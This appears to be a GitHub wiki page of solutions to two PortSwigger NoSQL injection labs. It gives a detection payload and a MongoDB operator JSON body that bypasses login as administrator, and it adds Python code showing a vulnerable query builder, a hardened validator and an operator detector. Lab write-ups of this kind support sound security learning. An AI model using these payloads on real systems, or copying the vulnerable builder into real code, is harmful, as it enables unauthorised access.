NoSQL injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Detecting NoSQL injection

  • Solution

    1. Select a category.
    2. Append `'||'1'=='1`.

Apprentice lab:
Exploiting NoSQL operator injection to bypass authentication

  • Solution

    1. Log in as wiener:peter. Observe the JSON POST request.
    2. Tamper with it to log in as administrator, replacing the string values with MongoDB query operators (see the request body below). Get familiar with MongoDB first.
      {
          "username": {
              "$regex":"admin.*"
          },
          "password": {
              "$ne": ""
          }
      }
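As an added example (not from the wiki or the lab), here is a Python sketch of why the operator payload above works and how a server side would refuse it: the vulnerable pattern drops the parsed JSON body straight into the MongoDB filter, the hardened one only accepts plain strings, and a small helper flags `$`-prefixed keys so such requests can be logged. The request bodies are constructed, and `validate_credentials`, `build_login_filter` and `contains_operator` are hypothetical names, not any framework's API.

```python
import json


class UnsafeCredentialError(ValueError):
    """Raised when a credential field is not a plain, bounded string."""


def build_login_filter_unsafe(body: dict) -> dict:
    # Vulnerable pattern: whatever JSON the client sent becomes part of the query,
    # so a dict like {"$ne": ""} is interpreted by MongoDB as an operator.
    return {"username": body["username"], "password": body["password"]}


def validate_credentials(body: dict) -> dict:
    """Return username/password only if both are non-empty strings of sane length."""
    out = {}
    for field in ("username", "password"):
        value = body.get(field)
        if not isinstance(value, str):
            raise UnsafeCredentialError(f"{field} must be a string, got {type(value).__name__}")
        if not value or len(value) > 256:
            raise UnsafeCredentialError(f"{field} has invalid length")
        out[field] = value
    return out


def build_login_filter(body: dict) -> dict:
    # Hardened pattern: values are guaranteed to be literal strings, so an exact
    # match has no operator semantics. (A real app would look up the user by name
    # and verify a password hash instead of matching a plaintext password.)
    creds = validate_credentials(body)
    return {"username": creds["username"], "password": creds["password"]}


def contains_operator(value) -> bool:
    """Detection helper: true if any key at any depth starts with '$'."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


# Constructed sample request bodies (not captured traffic).
NORMAL_LOGIN = '{"username": "wiener", "password": "peter"}'
OPERATOR_PAYLOAD = '{"username": {"$regex": "admin.*"}, "password": {"$ne": ""}}'


def classify(raw: str) -> str:
    """'ok' if the hardened builder accepts the body, 'rejected' otherwise."""
    try:
        build_login_filter(json.loads(raw))
        return "ok"
    except UnsafeCredentialError:
        return "rejected"


def request_contains_operator(raw: str) -> bool:
    return contains_operator(json.loads(raw))
```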